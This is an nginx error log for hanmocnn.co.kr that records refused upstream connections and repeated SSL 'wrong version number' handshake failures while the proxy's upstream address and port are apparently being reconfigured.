2026/02/14 22:53:09 [error] 236#236: *53 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:8081/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 22:53:09 [warn] 236#236: *53 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:8081/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 22:53:09 [error] 236#236: *53 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 22:53:09 [warn] 236#236: *53 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 22:53:09 [error] 236#236: *53 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://172.22.1.15:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
|
||||||
|
2026/02/14 22:53:09 [warn] 236#236: *53 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://172.22.1.15:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
|
||||||
|
2026/02/14 22:53:09 [error] 236#236: *53 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
|
||||||
|
2026/02/14 22:53:09 [warn] 236#236: *53 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
|
||||||
|
2026/02/14 22:53:23 [error] 236#236: *53 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:8081/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 22:53:23 [warn] 236#236: *53 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:8081/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 22:53:23 [error] 236#236: *53 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 22:53:23 [warn] 236#236: *53 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 22:53:23 [error] 236#236: *53 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
|
||||||
|
2026/02/14 22:53:23 [warn] 236#236: *53 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
|
||||||
|
2026/02/14 22:53:23 [error] 236#236: *53 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://172.22.1.15:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
|
||||||
|
2026/02/14 22:53:23 [warn] 236#236: *53 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://172.22.1.15:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
|
||||||
|
2026/02/14 22:59:10 [error] 287#287: *132 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 91.231.89.123, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 22:59:10 [warn] 287#287: *132 upstream server temporarily disabled while SSL handshaking to upstream, client: 91.231.89.123, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 22:59:10 [error] 287#287: *132 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 91.231.89.123, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 22:59:10 [warn] 287#287: *132 upstream server temporarily disabled while SSL handshaking to upstream, client: 91.231.89.123, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:04:30 [error] 381#381: *368 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 91.196.152.153, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:04:30 [warn] 381#381: *368 upstream server temporarily disabled while SSL handshaking to upstream, client: 91.196.152.153, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:04:30 [error] 381#381: *368 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 91.196.152.153, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:04:30 [warn] 381#381: *368 upstream server temporarily disabled while SSL handshaking to upstream, client: 91.196.152.153, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:09:54 [error] 383#383: *377 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 35.204.135.22, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:09:54 [warn] 383#383: *377 upstream server temporarily disabled while SSL handshaking to upstream, client: 35.204.135.22, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:09:54 [error] 383#383: *377 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 35.204.135.22, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:09:54 [warn] 383#383: *377 upstream server temporarily disabled while SSL handshaking to upstream, client: 35.204.135.22, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:45:26 [error] 506#506: *1033 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 94.247.172.129, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:45:26 [warn] 506#506: *1033 upstream server temporarily disabled while SSL handshaking to upstream, client: 94.247.172.129, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:45:26 [error] 506#506: *1033 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 94.247.172.129, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:45:26 [warn] 506#506: *1033 upstream server temporarily disabled while SSL handshaking to upstream, client: 94.247.172.129, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:51:03 [error] 509#509: *1193 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:51:03 [warn] 509#509: *1193 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:51:03 [error] 509#509: *1193 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:51:03 [warn] 509#509: *1193 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:51:15 [error] 509#509: *1193 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:51:15 [warn] 509#509: *1193 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:51:15 [error] 509#509: *1193 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:51:15 [warn] 509#509: *1193 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:51:31 [error] 530#530: *1208 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:51:31 [warn] 530#530: *1208 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:51:31 [error] 530#530: *1208 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:51:31 [warn] 530#530: *1208 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:51:33 [error] 530#530: *1208 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:51:33 [warn] 530#530: *1208 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:51:33 [error] 530#530: *1208 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:51:33 [warn] 530#530: *1208 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:51:38 [error] 530#530: *1208 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:51:38 [warn] 530#530: *1208 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:51:38 [error] 530#530: *1208 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:51:38 [warn] 530#530: *1208 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:52:14 [error] 543#543: *1232 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:52:14 [warn] 543#543: *1232 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:52:14 [error] 543#543: *1232 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:52:14 [warn] 543#543: *1232 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:56:38 [error] 605#605: *1291 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:56:38 [warn] 605#605: *1291 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:56:38 [error] 605#605: *1291 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:56:38 [warn] 605#605: *1291 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:56:43 [error] 605#605: *1291 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:56:43 [warn] 605#605: *1291 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:56:43 [error] 605#605: *1291 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:56:43 [warn] 605#605: *1291 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:56:51 [error] 606#606: *1299 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:56:51 [warn] 606#606: *1299 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:56:51 [error] 606#606: *1299 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:56:51 [warn] 606#606: *1299 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:57:26 [error] 194#194: *1 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:57:26 [warn] 194#194: *1 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:57:26 [error] 194#194: *1 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:57:26 [warn] 194#194: *1 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:57:49 [error] 194#194: *1 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:57:49 [warn] 194#194: *1 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:57:49 [error] 194#194: *1 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:57:49 [warn] 194#194: *1 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:59:06 [error] 214#214: *21 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://192.168.0.250:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:59:08 [error] 214#214: *21 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://192.168.0.250:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:59:12 [error] 214#214: *21 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://192.168.0.250:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:59:42 [error] 227#227: *37 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://192.168.0.250:8081/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:59:46 [error] 227#227: *37 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://192.168.0.250:8081/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/15 00:02:19 [error] 241#241: *64 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/15 00:02:19 [warn] 241#241: *64 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/15 00:02:19 [error] 241#241: *64 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/15 00:02:19 [warn] 241#241: *64 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/15 00:02:52 [error] 253#253: *76 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:8081/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/15 00:02:52 [warn] 253#253: *76 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:8081/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/15 00:02:52 [error] 253#253: *76 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/15 00:02:52 [warn] 253#253: *76 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/15 00:03:33 [error] 282#282: *107 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://192.168.0.250:8081/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/15 00:03:40 [error] 282#282: *107 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://192.168.0.250:8081/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/15 00:04:37 [error] 292#292: *126 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://222.117.41.51:8081/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/15 00:04:49 [error] 305#305: *138 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://222.117.41.51:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/15 00:05:16 [error] 319#319: *150 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://222.117.41.51:8081/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/15 00:10:21 [error] 363#363: *212 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://192.168.0.250:8081/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/15 00:53:59 [warn] 378#378: *575 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/00/0000000001 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
|
||||||
|
2026/02/15 01:03:57 [warn] 378#378: *585 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/00/0000000002 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
|
||||||
|
